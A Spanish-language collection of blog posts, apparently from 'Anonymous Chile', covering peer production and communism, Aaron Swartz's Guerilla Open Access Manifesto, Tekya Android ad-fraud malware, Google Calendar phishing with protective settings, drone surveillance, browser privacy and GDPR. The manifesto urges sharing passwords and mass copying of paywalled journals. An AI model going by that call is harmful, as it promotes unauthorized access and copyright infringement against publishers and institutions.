El capitalismo se encuentra en una crisis profunda y existe un movimiento anticapitalista global. Aun más, la base tecnológica para establecer una sociedad de pares en pleno derecho existe en la actualidad y un número considerable de trabajadores cognitivos comprenden e intentan expandir el P2P con entusiasmo. Pero no hay garantía de que el P2P prevalecerá automáticamente sobre el capitalismo. Tim Wu (2010) argumenta que los imperios estatales y corporativos lucharán con uñas y dientes para poner las tecnologías de la información bajo su control, tal como hicieron con la tecnología de radio. Pero el éxito del estado y el capital al prevenir al P2P de convertirse en el modo de producción dominante tampoco está garantizado de antemano. Puede suceder cualquiera de las dos cosas dependiendo de las consecuencias de las luchas sociales. El movimiento de pares, si es soportado por todos los otros movimientos sociales de la multitud, podría prevalecer. La lucha social determinará también qué tipo de sociedad de pares tendremos.

¿Cuáles son entonces los escenarios posibles para que la producción de pares se convierta en el modo de producción dominante? ¿Crecerá paralelamente con el capitalismo hasta que lo supere? ¿O su desarrollo será mucho más complejo, marcado por flujos, reflujos y derrotas temporales? ¿Será una revolución social que expropie medios de producción estratégicos a los capitalistas un pre-requisito para que la producción de pares se vuelva el modo de producción dominante? ¿Cuál será el rol de la lucha social y la conciencia humana en el avance de la producción de pares? La respuesta a estas preguntas necesita el esfuerzo colectivo de muchos. Aquí, será suficiente mencionar que “la idea del comunismo” se vuelve atractiva nuevamente. No obstante no es suficiente, aunque realmente necesario, decir que “otro comunismo es posible” (Harvey, 2010, p. 259) sino que debemos imaginar los contornos generales de la producción comunista. Aquí yace el significado histórico y político de la producción de pares. Representa, aunque en una forma embrionaria, el modelo para la producción y distribución comunista. El éxito de este modo de producción dependerá definitivamente de la lucha social que lo asista. ¿Cuáles son entonces las fortalezas y debilidades de la producción social de pares en tanto movimiento? Su fuerza es que es una práctica productiva.

Su debilidad, como argumenta Söderberg (2007), es que la mayor parte de los participantes de la producción de pares carece de una conciencia anticapitalista explícita, ni hablar de una conciencia comunista. Como ya se dijo, hay algunos, como Moglen (2003), Barbrook (2000) y Kleiner (2010), que definen al movimiento como comunista. Sin embargo, el involucramiento en la producción de la mayoría está motivado por razones personales, tales como realizar cosas excitantes y creativas y mejorar sus propias habilidades. Aun así los participantes son concientes y valoran el hecho de estar produciendo comunes. A pesar de la falta de una visión comunista definida, las observaciones etnográficas muestran que los participantes han desarrollado y aprecian creencias progresivas, tales como la valoración de la cooperación, preferencia por la creatividad y la felicidad sobre el dinero y la carrera, preocupación por la ecología, preferencia por los intereses públicos sobre los egoístas, antipatía al consumismo y preocupación por los pobres y el tercer mundo. Por ejemplo, activistas tecnológicos han ayudado a activistas iraníes, tunesinos, egipcios y sirios a organizar esferas públicas de red.

Las comunidades de pares también desarrollan actitudes morales progresivas y humanistas. Los miembros de estas comunidades no aprecian la fanfarronería, la auto promoción, la deshonestidad y la manipulación calculadora. Mientras se reconoce a los individuos y se les da crédito por sus contribuciones el interés común por mantener y desarrollar comunidades de pares productivas es más fuerte. Sin duda la formación de un colectivismo sólido y una cultura progresiva que crezca orgánicamente alrededor de la producción de pares y otros movimientos sociales serán esenciales para la formación de una sociedad comunista. A pesar del significado de esta cultura-en-progreso, no puede remediar la falta de una clara visión programática y comunista y una crítica teórica sostenida del capitalismo entre sus participantes.

La falta de una clara visión colectivista combinada con el medio ambiente capitalista dominante vuelve a la producción de pares vulnerable a la invasión del capitalismo. Muchos proyectos que han comenzado como una producción P2P fueron reconvertidos en empresas capitalistas. Bajo esta condición la propagación de una clara visión comunista entre los participantes de la producción de pares será indispensable para el avance de este nuevo modo de producción.

Sin duda existe un sector concientemente comunista entre los productores de la producción de pares. Este sector comunista debe ponerse al hombro una lucha teórica intransigente y crítica dentro del movimiento de la producción P2P. Sin embargo, esta lucha debe ser conducida en términos fraternales y evitar el sectarismo. Los comunistas no deben posicionarse contra los participantes no comunistas del movimiento de pares.

De hecho, como argumenta Barbrook (2000), todos los contribuidores a la producción de pares están involucrados en una práctica material comunista, sin importar sus actitudes hacia el comunismo. La tarea de los comunistas es describir y teorizar esta práctica y criticar al capitalismo desde esta práctica. La producción de pares misma ya ha desarrollado un excepcional procedimiento para el avance de un debate crítico entre sus participantes. La contribución de todos a la producción es revisada, evaluada y acreditada por los demás abierta y públicamente en la red. Este procedimiento también puede ser utilizado (y ya lo es en cierto punto) en los debates políticos, teóricos e ideológicos dentro de las comunidades de pares.

Sumada a la falta de conciencia de clase entre los pares productores y tal vez como resultado de esto, la ausencia de alianzas/conexiones sostenidas entre pares productores y otros movimientos sociales progresivos es otra debilidad del movimiento de pares. Esta es también una debilidad de los otros movimientos sociales. La alianza entre un movimiento P2P auto-conciente y otros movimientos sociales, con potenciales y objetivos antisistémicos, fortalecerá ambos lados.

La producción de pares recibirá apoyo en su lucha contra el cada vez más draconiano régimen de copyright que ha sido impuesto en los últimos treinta años. La producción de pares, por otro lado, provee a los otros movimientos sociales con modelos para una alternativa más justa, democrática y ecológica de la cooperación en la producción, esfera pública y autogestión; y la realización de la libertad y creatividad individuales. El hecho mismo que Occupy Wall Street haya sido iniciado por Adbusters y Anonymous, y que su forma de organización descentralizada/en red, así como la de los indignados, sean muy similares a la del P2P, resulta muy prometedor.

Existe al menos un sector entre los pares productores que relacionan claramente su práctica con problemáticas más amplias sobre justicia, libertad, bienes comunes y democracia. También participan en otros movimientos sociales. La izquierda académica y activista, por otro lado, aun no ha comprendido la novedad y el significado histórico de la producción de pares. Usualmente rebajan el significado de la producción de pares como el hobby de algunos yuppies o como un epifenómeno en los márgenes del modo de producción capitalista. Otros rebajan su significado sugiriendo que los tomates o los pepinos no pueden ser producidos por el P2P. Ignoran el hecho que la tecnología y las ciencias de la vida, particularmente la microbiología, incluyendo el secuencimiento del ADN, que se están volviendo cada vez más importantes para la agricultura, pueden ser producidos a través de la cooperación de pares.

Otro argumento, haciendo un gesto post-colonial, sugiere que las computadoras, las tecnologías de la información y las impresoras tridimensionales son el lujo exclusivo de los privilegiados. Aunque esto es verdad hasta cierto punto, no debe ser tratado como un hecho estático. Los grupos subalternos luchan por apropiarse de las tecnologías de la información para sus propios objetivos. Los zapatistas utilizaron la Internet para movilizar apoyo global para su movimiento. Recientemente, trabajadores inmigrantes chinos, activistas verdes en Irán y activistas en Egipto, Túnez y Siria han utilizado la Internet para circular noticias sobre sus protestas. Las computadoras portátiles y los teléfonos móviles, que adquirieron las funciones de las computadoras, se están volviendo cada vez más baratos y por lo tanto asequibles por muchos, aunque no por todos, en el Sur Global. Lo mismo es cierto para las impresoras tridimensionales. La izquierda necesita reconocer la lucha por el conocimiento como el nuevo terreno para la lucha social y darle la debida significación a la producción de pares en este contexto.

Un movimiento de protesta importante ha barrido el globo en 2011. ¿Qué pasaría si estos movimientos de protesta ponen en su agenda la apropiación de los medios de producción más importantes y su reorganización bajo el sistema de cooperación de pares?

Manifiesto por la Guerrilla del Acceso Abierto – Aaron Swartz, Julio de 2008

Publicada el 17/04/2020 - 02/08/2021 por Anonymous Chile

La información es poder. Pero como con todo poder, hay quienes lo quieren mantener para sí mismos. La herencia científica y cultural del mundo completa, publicada durante siglos en libros y journals, está siendo digitalizada y apresada en forma creciente por un manojo de corporaciones privadas. ¿Quieres leer los papers que presentan los más famosos resultados de las ciencias? Vas a tener que mandarle un montón de plata a editoriales como Reed Elsevier.

Están aquellos que luchan por cambiar esto. El Movimiento por el Acceso Abierto ha luchado valientemente para asegurarse que los científicos no cedan su derecho de copia, sino que se aseguren que su trabajo sea publicado en Internet, bajo términos que permitan el acceso a cualquiera. Pero incluso en los mejores escenarios, su trabajo sólo será aplicado a las cosas que se publiquen en el futuro. Todo lo que existe hasta este momento se ha perdido.

Ese es un precio muy alto por el que pagar. ¿Forzar a los académicos a pagar dinero para poder leer el trabajo de sus colegas? ¿Escanear bibliotecas enteras para sólo permitir leerlas a la gente de Google? ¿Proveer artículos científicos a aquellos en las universidades de élite del Primer Mundo, pero no a los niños del Sur Global? Es indignante e inaceptable.

“Estoy de acuerdo”, dicen muchos, “¿pero qué podemos hacer? Las compañías detentan los derechos de copia, hacen enormes cantidades de dinero cobrando por el acceso y es perfectamente legal –no hay nada que podamos hacer para detenerlos.” Pero sí hay algo que podemos hacer, algo que ya está siendo hecho: podemos contraatacar.

A ustedes, con acceso a estos recursos –estudiantes, bibliotecarios, científicos– se les ha otorgado un privilegio. Ustedes pueden alimentarse en este banquete del conocimiento mientras el resto del mundo queda fuera. Pero no es necesario –de hecho, moralmente, no es posible– que se queden este privilegio para ustedes. Tienen el deber de compartirlo con el mundo. Y lo han hecho: intercambiando contraseñas con colegas, haciendo solicitudes de descarga para amigos.

Mientras tanto, aquellos de ustedes que se han quedado fuera no están cruzados de brazos. Han estado atravesando agujeros sigilosamente y trepando vallas, liberando la información encerrada por las editoriales y compartiéndola con sus amigos.

Pero todas estas acciones suceden en la oscuridad, escondidas en la clandestinidad. Se les llama robo o piratería, como si compartir la riqueza del conocimiento fuera el equivalente moral de saquear un barco y asesinar a su tripulación. Pero compartir no es inmoral –es un imperativo moral. Sólo aquellos que están cegados por la codicia se negarían a hacerle una copia a un amigo.

Las grandes corporaciones, por supuesto, están cegadas por la codicia. Las leyes bajo las que operan lo requieren –sus accionistas se sublevarían por mucho menos. Y los políticos que se han comprado los apoyan, aprobando leyes que les dan el poder exclusivo de decidir quién puede hacer copias.

No hay justicia alguna en obedecer leyes injustas. Es tiempo de salir a la luz y en la gran tradición de la desobediencia civil, declarar nuestra oposición a este robo privado de la cultura pública.

Necesitamos tomar la información, donde sea que esté guardada, hacer nuestras copias y compartirlas con el mundo. Necesitamos tomar las cosas que están libres del derecho de copia y agregarlas a este archivo. Necesitamos comprar bases de datos secretas y ponerlas en la Web. Necesitamos descargar journals científicos y subirlos a redes de compartición de archivos. Necesitamos pelear una Guerrilla por el Acceso Abierto.

Si somos los suficientes, alrededor del mundo, no sólo enviaremos un fuerte mensaje en oposición a la privatización del conocimiento –la haremos una cosa del pasado. ¿Vas a unírtenos?

Aaron Swartz, Julio de 2008.

Tekya en Google Play amenaza a millones de usuarios

Publicada el 16/04/2020 - 12/08/2021 por Anonymous Chile

Tekya es una nueva familia de malware descubierta por Check Point Software, que logró saltarse la seguridad de Google Play Store y operar en 56 aplicaciones con el objetivo de cometer fraude publicitario móvil.

Aunque Google ha tomado amplias medidas para asegurar su tienda de aplicaciones y detener la actividad maliciosa, los piratas informáticos aún encuentran maneras de infiltrarse en la tienda y acceder a los dispositivos de los usuarios. A pesar de los crecientes esfuerzos de Google, una parte del malware para Android sale desde la tienda oficial.

Millones de usuarios de teléfonos móviles han descargado involuntariamente aplicaciones maliciosas infectados por el Tekya, que tienen la capacidad de comprometer tus datos, credenciales, correos electrónicos, mensajes de texto y ubicación geográfica. Con el objetivo de cometer fraude publicitario móvil, el malware imita las acciones del usuario para hacer clic en anuncios y campañas de agencias como AdMob, AppLovin, Facebook y Unity.

Además, veinticuatro de las aplicaciones infectadas estaban dirigidas a niños (desde rompecabezas hasta juegos de carreras), mientras que el resto eran aplicaciones de todo tipo, de cocina, calculadoras, descargadores, traductores, etcétera).

Tekya: sin detección por Play Protect, ni por Virus Total

El malware Tekya ofusca el código nativo para evitar ser detectado por Google Play Protect y utiliza el mecanismo ‘MotionEvent’ en Android (introducido en 2019) para imitar las acciones del usuario y generar clics. Durante esta investigación, el malware tampoco fue detectado por VirusTotal y se extendió en 56 aplicaciones descargables disponibles en en Google Play.

Esta campaña clonó aplicaciones populares legítimas para ganar audiencia, principalmente con menores, ya que la mayoría de aplicaciones para el malware Tekya son juegos para niños. La buena noticia es que todas esas aplicaciones infectadas se han eliminado de Google Play.

Sin embargo, esto resalta una vez más que Google Play Store aún puede alojar aplicaciones maliciosas. Hay casi 3 millones de aplicaciones disponibles en la tienda, con cientos de novedades que se cargan a diario, lo que dificulta verificar que cada aplicación sea segura. Por lo tanto, los usuarios no pueden confiar solo en las medidas de seguridad de Google Play para garantizar que sus dispositivos estén protegidos.

Además del adware (software publicitario) otro tipo de aplicación maliciosas que llegan desde Google Play incluyen las que se conocen como «estafas de suscripción». Hace pocas semanas investigadores de Sophos descubrieron 15 aplicaciones de este tipo con más de 20 millones de descargas. Otro tipo de malware usado son las aplicaciones de suscripción premium de SMS. Con estas aplicaciones, las víctimas se registran -sin saberlo- en costosos servicios premium. así como aplicaciones que agrupan troyanos bancarios y stalkerware.

Como vemos, las aplicaciones maliciosas de Google Play siguen llegando a pesar de los grandes esfuerzos de Google, especialmente desde el servicio de seguridad Play Protect que escanea y verifica hasta 50.000 millones de apps diarias. No parece ser suficiente.

Phishing en el Calendario de Google

Publicada el 16/04/2020 - 02/08/2021 por Anonymous Chile

Los delincuentes se han dado cuenta de que pueden aprovechar la configuración de calendario para plantar sus propios eventos con enlaces de phishing. En muchos casos, esto también desencadena notificaciones automáticamente, legitimando aún más los eventos maliciosos. La estafa es particularmente efectiva porque las entradas y notificaciones del calendario provienen de aplicaciones confiables como Google Calendar.

El ataque proviene simplemente de los estafadores que envían una ola de invitaciones a eventos de calendario a los usuarios de Google Calendar. El objetivo es aprovechar una configuración predeterminada de que los calendarios agregan automáticamente cualquier evento y envían una notificación al respecto. Entonces, los estafadores precargan el texto de la entrada del evento con un enlace de phishing y una línea corta para atraer a los objetivos a hacer clic.

En general se observan enlaces a encuestas falsas con descripciones de eventos breves como «Recibió una recompensa en efectivo» o «Ganaste un premio». La idea, por supuesto, es hacer que las víctimas hagan clic y luego ingresen información personal en el formulario malicioso. A veces, los formularios engañan a los objetivos para que ingresen la información de la tarjeta de crédito al pedirles que envíen una pequeña cantidad de dinero para ingresar y ganar una suma mucho mayor.

Para realizar este ataque, los estafadores usan una lista de correo electrónico preparada para enviar sus invitaciones fraudulentas y pueden establecer recordatorios para entregar el mismo mensaje muchas veces hasta que se haga clic en el enlace deseado o se elimine la invitación. Este método de entrega es bastante nuevo y está creciendo.

Los phishers podrían usar la misma estrategia de eventos de calendario para impulsar todos los diferentes tipos de enlaces de phishing, quizás haciéndose pasar por un formulario de planificación de eventos.

Los usuarios de Google Calendar también pueden protegerse contra estas invitaciones no deseadas de la siguiente manera:

  • Abrir la configuración de Google Calendar en un navegador.
  • Ir a Configuración de los eventos – Añadir invitaciones de forma automática.
  • Seleccionar la opción «No, solo mostrar las invitaciones a las que he respondido».
  • En Opciones – «Mostrar eventos rechazados» esté desmarcado, para que los eventos maliciosos no lo persigan incluso después de rechazarlos.

El phishing de calendario son especialmente perniciosos, porque surgen inesperadamente en el contexto de un utilitario muy confiable.

La vida bajo el dron

Publicada el 15/04/2020 - 02/08/2021 por Anonymous Chile

El anuncio sobre la implementación de drones de vigilancia con tecnología de reconocimiento facial ha generado una interesante discusión entorno al balance entre el combate a la delincuencia y el respeto a la vida privada.

Un aspecto menos explorado -pero igual de importante- de este debate, versa sobre la forma en que los sistemas de vigilancia masiva e indiscriminada pueden afectar el desarrollo de las personas más allá de su privacidad.

Una de las particularidades del derecho a la intimidad es que esta funciona como condición necesaria para el ejercicio de otros derechos. Sin privacidad no existe libertad de expresión, asociación, petición u organización. Incluso la libertad de conciencia depende de la existencia de un espacio personal libre de la injerencia de terceros. En otras palabras, la capacidad de autodeterminación va de la mano con la existencia de un espacio de exclusión de terceros; en su ausencia la sociedad deviene en un espacio de absoluto control y colectivización.

La privacidad también se caracteriza por las formas en que se vulnera, ya que no sólo ocurre cuando efectivamente somos grabados, observados o vigilados en nuestra intimidad; sino también cuando comenzamos a evitar ciertos comportamientos, cambiamos nuestra rutina o nos abstenemos de ciertas acciones por miedo a ser vigilados: aquí también se está vulnerando nuestra autonomía.

Entonces, corresponde que como sociedad reflexionemos sobre los efectos que la vigilancia puede tener en la población ¿Quién nos asegura que este sistema no se utilizará para perfilar e identificar a dirigentes sociales? Nadie duda de las buenas intenciones del actual gobierno, pero ¿y si en las próximas elecciones asume el cargo alguna versión criolla de Vladimir Putin o Nicolás Maduro? Si -por distintas razones- ciertos individuos dejan de participar en manifestaciones legítimas por miedo a ingresar a alguna base de datos del gobierno o algún otro tipo de represalia, entonces nuestra democracia se habrá debilitado enormemente.

Por último, vale la pena recordar que, más allá de los aspectos jurídicos, la regulación de la vigilancia siempre responde a la pregunta sobre cuánto poder estamos dispuestos a entregarle a las autoridades políticas a cambio de una efímera promesa de seguridad.

Brave es el mejor navegador para la privacidad, según expertos

Publicada el 14/04/2020 - 02/08/2021 por Anonymous Chile

Los usuarios que buscan un navegador centrado en la privacidad pueden considerar Brave primero, según un estudio publicado esta semana. Douglas Leith, profesor de sistemas informáticos en la Universidad de Trinity, examinó seis navegadores para su informe: Privacidad del navegador web: ¿qué dicen los navegadores cuando llaman a su casa?

Descubrió que el navegador basado en Chromium de Brave es el que tiene menos probabilidades de revelar información de identificación única sobre la computadora que lo usa.

El estudio examinó seis navegadores: Chrome, Firefox, Safari, Brave, Edge y Yandex. Utilizó varias pruebas para deducir si el navegador puede rastrear la dirección IP del usuario a lo largo del tiempo y si se filtran detalles de las visitas a la página web. Para hacer esto, examinó los datos compartidos en el inicio después de una nueva instalación, en un reinicio y después de pegar y escribir una URL en la barra de direcciones. También exploró lo que hacía el navegador cuando estaba inactivo.

A pesar de que Mozilla hace un tema de privacidad en Firefox, fue Brave, desarrollado por el fundador de Mozilla (y creador de JavaScript) Brendan Eich, quien ganó. Brave, que ha acusado a Google de violaciones de privacidad, es «con mucho el más privado de los navegadores estudiados» cuando se usa con su configuración lista para usar, según el periódico.

El estudio colocó a los navegadores en una de las tres clases de privacidad, en función del período de tiempo durante el cual retienen los identificadores. Brave consigue la mejor clase para sí misma porque usa lo que el estudio llama identificadores «efímeros» que vinculan un puñado de transmisiones y luego se reinicia. Esto significa que no recuerda su identificador en los reinicios del navegador.

El papel agrupa Safari, Firefox y Chrome juntos en la segunda banda. Estos navegadores comparten algunos problemas de privacidad, advierte el documento, incluido el etiquetado automático de cada instancia del navegador con identificadores únicos de sesión e instancia de navegador que pueden persistir durante los reinicios. Estos comportamientos se pueden deshabilitar, pero se activan silenciosamente de forma predeterminada, según el documento.

La investigación selecciona cuatro identificadores que usa Firefox. Dos creados por el navegador persisten durante los reinicios del navegador, mientras que el tercero cambia entre las sesiones del navegador, pero podrían vincularse entre sí porque los valores antiguos y nuevos se envían juntos en un mensaje de telemetría, según el periódico. El cuarto identificador, creado por el servidor, está asociado con un socket web abierto utilizado para los servicios push de Firefox. Firefox también envía direcciones IP de usuario con estos identificadores.

El documento de Leith reconoce que Mozilla elimina las direcciones IP enviadas con estos identificadores después de 30 días, pero se preocupa de que la empresa «guarde silencio sobre los usos que se le dan a los datos IP». Le preocupa que esto pueda usarse para rastrear la ubicación del usuario y agrega: «Eso no significa que dicha vinculación realmente tenga lugar, solo que existe el potencial para que se haga».

Leith le había preguntado a Mozilla si usaba direcciones IP para el seguimiento de la ubicación, y también preguntó por la política de uso de direcciones IP de la compañía como parte de su servicio push. No recibió respuesta. El portavoz de Mozilla, Justin O’Kelly, no abordó esos problemas específicamente con nosotros, pero respondió:

«Firefox recopila algunos datos técnicos sobre cómo los usuarios interactúan con nuestro producto, pero eso no incluye el historial de navegación del usuario. Estos datos se transmiten junto con un identificador único generado aleatoriamente. Las direcciones IP se retienen por un período corto para la detección de seguridad y fraude y luego se eliminan. Se eliminan de los datos de telemetría y no se utilizan para correlacionar la actividad del usuario en las sesiones de navegación.»

El documento de Leith también llama a Safari, que dice que permite que todos los sitios de terceros que figuran en su página de inicio establezcan cookies sin el consentimiento del usuario. También llama a casa a icloud.com incluso desde máquinas que no están registradas con ese servicio de Apple, advierte el periódico, llamando a esta conexión «espuria».

Apple también fue el navegador más agresivo a la hora de enviar datos que los usuarios escribieron en la barra de direcciones a los servidores de Apple con fines de autocompletar, advirtió el periódico: «Las solicitudes a Apple incluyen identificadores que persisten en los reinicios del navegador y, por lo tanto, se pueden usar para vincular las solicitudes y reconstruir el historial de navegación». Apple no respondió a ninguna solicitud de comentarios.

Los teléfonos Chrome de Google muestran casi todas las letras escritas en la barra de búsqueda con fines de autocompletar, según el periódico. Incluso después de desmarcar la casilla «permitir telemetría», el navegador configura una cookie con el servidor de Google que luego se comunica cada vez que se abre el navegador, encontró Leith, y esto sucede incluso si el usuario no ha iniciado sesión en Google. Google declinó hacer comentarios para nuestro artículo, pero nos señaló su Libro Blanco de Privacidad de Chrome.

El problema para muchos de estos navegadores parece no ser tanto lo que están haciendo, sino el hecho de que lo hacen de manera predeterminada, dejando a los usuarios que no son expertos en tecnología o que no lo saben, están abiertos a más información. Del artículo de Leith:

«En resumen, Chrome, Firefox y Safari se pueden configurar para que sean mucho más privados, pero esto requiere conocimiento del usuario (ya que las configuraciones intrusivas están habilitadas silenciosamente) e intervención activa para ajustar las configuraciones.»

El periódico reserva las preocupaciones más graves para el tercer grupo menos privado que identificó, que contiene Edge y Yandex. Estos identificadores de uso vinculados al hardware del dispositivo, dijo, persisten en las nuevas instalaciones del navegador. También se pueden usar para vincular diferentes aplicaciones que se ejecutan en el mismo dispositivo. Edge también se pone en contacto con un servidor de publicidad de Microsoft, dijo el periódico, que envía varios identificadores que Edge luego repite en solicitudes posteriores a ese servidor. Agregó:

«La carga de la página de bienvenida de Edge establece una serie de cookies. En particular, esto incluye una cookie para vortex.data.microsoft.com, que parece ser un servidor de registro de datos, y permite que los datos transmitidos a este servidor se vinculen a la misma instancia del navegador.»

Incluso pegar (en lugar de escribir) una URL en la barra de direcciones contiene lo que el paper llama «consecuencias no deseadas», incluida la filtración del historial de navegación del usuario a Bing a través de la API de autocompletado del motor de búsqueda, y una vez más contactando vortext.data.microsoft.com.

La página de privacidad de Microsoft Edge dice que envía identificadores de dispositivo como parte de un servicio de informes de diagnóstico que los usuarios pueden desactivar. Los usuarios también pueden eliminar estos datos en el servidor. De acuerdo con su documento técnico de privacidad de Edge, las personas pueden desactivar las Sugerencias de búsqueda para evitar que envíe sus términos de búsqueda a Bing, que de lo contrario los mantiene durante seis meses.

Yandex no respondió a las acusaciones del paper de que su navegador, popular entre los hablantes de ruso, envía datos de navegación del usuario a los servidores de Yandex como parte de su API de autocompletado, junto con el texto de las páginas web a su servicio de traducción. También envía la dirección MAC hash SHA-1 de una máquina a Yandex, junto con los identificadores del navegador, lo que les permite unirse, dijo el periódico de Leith.

Derecho a la privacidad en un mundo globalizado

Publicada el 14/04/2020 - 02/08/2021 por Anonymous Chile

Preservar la intimidad es una preocupación desde hace tiempo, pero el derecho a la privacidad online ya se empezó a contemplar en las leyes.

Las nuevas legislaciones en materia de protección de datos personales en la Unión Europea ponen de manifiesto el derecho de los ciudadanos a procurar su privacidad, especialmente en la era digital, mismo que a lo largo de los años ha representado una preocupación constante.

Si bien la protección de los datos personales no determina todos los aspectos de la privacidad, en la actualidad se han convertido en un elemento básico para cuidar de nuestra información en el contexto de las nuevas tecnologías, ya que en conjunto con las actividades en Internet, definen nuestra identidad digital. Sin duda, se trata de elementos básicos para mantener nuestra percepción de privacidad.

La privacidad como un derecho de las personas

«El derecho a la privacidad surgió con la inquietud por preservar la intimidad»

Definir la privacidad no es sencillo, ya que las concepciones cambian con el tiempo, las costumbres, las generaciones e incluso debido a factores como la tecnología. El concepto puede resultar subjetivo y por esta razón, difícil de consensuar.

A pesar de ello, el derecho a la privacidad se vislumbró desde el momento en el que surgió la inquietud por preservar la intimidad de las personas y la conciencia por otorgarles esa facultad. Este derecho puede definirse como aquel que los individuos poseen para separar aspectos de su vida íntima del escrutinio público, por lo que sin distinción, todos tenemos derecho a ella.

Como lo plantea Diego García Ricci en su documento “Artículo 16 Constitucional. Derecho a la privacidad”, las primeras acepciones de este derecho fueron acuñadas en Estados Unidos a finales del siglo XIX, debido a la aparición de las fotografías instantáneas. Con la tecnología de aquellos años, se atentaba contra la “vida doméstica”, desde el momento en el que las imágenes podían ser difundidas de forma masiva. En aquéllos años se definió como el derecho a no ser molestado.

Posteriormente, el concepto de privacidad incluyó otros elementos destacables como la facultad que toda persona posee para determinar la manera, el momento y la información personal que podía ser comunicada con otras personas. En otras palabras, esta idea ofrecía la posibilidad y el derecho a controlar la información propia, incluso luego de que fuese compartida.

Como en aquellos años, el derecho a la privacidad continúa vigente y es cada vez más relevante, como una forma de procurar nuestras actividades íntimas y del mismo modo, la preocupación se mantiene debido a los nuevos desarrollos tecnológicos. En la actualidad estamos inmersos en un sinnúmero de nuevas herramientas digitales que exponen nuestras actividades cada vez más, incluso con nuestro consentimiento, o también, a partir de nuestro desconocimiento.

La protección de datos como base de la privacidad en Internet

Si bien la protección de datos personales no agota todos los aspectos de privacidad, en la era digital se han convertido en una pieza clave, ya que buscan proteger lo que se ha denominado la identidad digital; esta puede definirse como la información asociada a las actividades que los usuarios llevamos a cabo en el ciberespacio, como resultado de la interacción con otros usuarios, organizaciones o servicios en Internet, donde generalmente se trata de datos personales que suelen ser concedidos a terceros.

Estos últimos suelen procesar, almacenar o transmitir los datos de los usuarios, incluso hasta el grado de lucrar con nuestra información. En la actualidad, muchos servicios de Internet conocen gran parte de las actividades de los usuarios, gustos, preferencias, así como sus datos personales, mismos que se utilizan con fines comerciales. Por lo tanto, la protección de esta información contribuye a preservar nuestra intimidad.

Derechos en las nuevas leyes de protección de datos

En el contexto de las legislaciones para protección de datos personales de la llamada General Data Protection Regulation (GDPR), se consideran nuevos derechos, acordes con las problemáticas actuales. Esta nueva ley única confiere otros derechos a los ciudadanos de la Unión Europea, como el derecho al olvido. Ahora, las personas tienen la facultad para solicitar que las empresas borren sus datos personales en determinadas circunstancias, por ejemplo, cuando la información es irrelevante para los propósitos iniciales cuando fue recopilada o cuando el dueño de los datos retira su consentimiento.

También se considera el derecho de oponerse a la elaboración de perfiles, lo que significa que las personas podrán oponerse a que sus datos personales se procesen o sean utilizados para la elaboración de perfiles en determinadas circunstancias. Por perfil se entiende a las formas de seguimiento en línea y publicidad conductual, es decir, el envío de publicidad a partir de hábitos de navegación y gustos de los usuarios, por lo que esta actividad será más difícil para las empresas que emplean esta información para fines comerciales, ya que deberán implementar los mecanismos de consentimiento adecuados.

Un tercer elemento que considera esta ley es el derecho a la portabilidad de datos. Las personas tienen la facultad de obtener una copia de sus datos personales de la empresa que procesa su información en un formato común y legible.

Si bien la implementación de estas directrices dentro de las organizaciones puede resultar compleja y todavía no se define cómo funcionará en la práctica, las empresas dentro y fuera de la Unión Europea deben comenzar a considerar la manera en la que podrán hacer efectivos estos derechos, lo que se prevé no será una tarea sencilla. Además de tener efecto sobre las empresas, también podrá generar cambios en los individuos, dándoles un mayor control y derechos sobre su información personal. Esperamos que puedan ejercerlos.

Tesis sobre el trabajo digital

Publicada el 13/04/2020 - 02/08/2021 por Anonymous Chile

El par-a-par es la ideología de la nueva clase trabajadora cognitiva. La mayoría de los trabajadores de los países occidentales no están ya involucrados en el trabajo fabril, sino que se convirtieron en trabajadores cognitivos o de servicios. Existen conexiones muy fuertes entre los valores de pares tales como la apertura y la participación, así como la orientación hacia los comunes y las condiciones estructurales de esta nueva clase trabajadora.

Primero, el par-a-par responde a las condiciones ideales del trabajo cognitivo. Para que el trabajo cognitivo progrese, necesita la participación de todos aquellos que puedan contribuir, el conocimiento necesita ser compartido libremente y estar disponible para todos los que necesiten el mismo material en el futuro. No es accidental que la producción de pares haya nacido entre los desarrolladores de software, que dependen específicamente del acceso a código compartible para poder desarrollar su trabajo.

Para el trabajo cognitivo asalariado que se encuentra bajo condiciones estructurales de explotación y propiedad intelectual, la producción de pares es la modalidad de vida y trabajo a la que los trabajadores cognitivos aspiran y en la que se involucran en cuanto pueden escapar del trabajo asalariado; o a la que están obligados luego de un precario éxodo del trabajo asalariado en el contexto de condiciones de crisis económica temporal o permanente.

El par-a-par corresponde a las necesidades objetivas de la nueva estructura artesanal del trabajo cognitivo. Los trabajadores cognitivos ya no se encuentran principalmente envueltos en el trabajo fabril de larzo plazo, sino que tienen carreras bastante flexibles, por opción o necesidad, que requieren saltar de trabajadores asalariados, a consultores independientes, a emprendedores y de vuelta a trabajadores. Bajo condiciones de flexibilidad elegida o forzada, los trabajadores tienen un interés objetivo en ser puestos en red, para ganar experiencia práctica y capital tanto social como reputacional, así como acceso a redes de intercambio y solidaridad. La producción de pares en red es el mejor camino para percibir estas ventajas.

El par-a-par y el involucramiento en la producción de pares son las condiciones objetivas de la participación en redes y por lo tanto afectan y comprometen a todos los usuarios de la red, al grado de involucrarlos en la colaboración e intercambio de conocimiento en línea y la eventual creación de valor común a través de esa agregación libre de esfuerzos. Todo trabajo, sin embargo, posee aspectos cognitivos y hoy en día todos los trabajadores están expuestos a las redes y a sistemas de valores de pares. Por lo tanto, este sistema de valores y producción en tanto dinámica social no está constreñido a los trabajos cognitivos de tiempo completo sino a la totalidad de la clase trabajadora y de la gente que trabaja.

Debido a la naturaleza hiperproductiva de la producción de pares, que permite la más amplia participación e ingreso, involucramiento apasionado y distribución universal de sus beneficios (condicionados por el acceso a la red), atrae la participación e involucramiento del capital a través de la actividad de los capitalistas redárquicos.

El capital redárquico es el sector del capital que entiende la naturaleza hiperproductiva de la producción de pares y por lo tanto habilita y empodera la ocurrencia de la producción social, condicionada por la posibilidad de la extracción de valor para el beneficio de los poseedores del capital.

La producción de pares es inmanente a la vez que trascendente frente al capitalismo porque posee características que des-comodifican tanto el trabajo como el valor inmaterial e instituye un campo de acción basado en las dinámicas de pares y su sistema de valores. La producción de pares funciona dentro del ciclo de acumulación de capital pero también dentro del nuevo ciclo de creación y acumulación de los comunes. El capital redárquico utiliza la producción de pares para su propia acumulación de capital; los pares productores abogan naturalmente por la existencia continuada y protección de sus comunes.

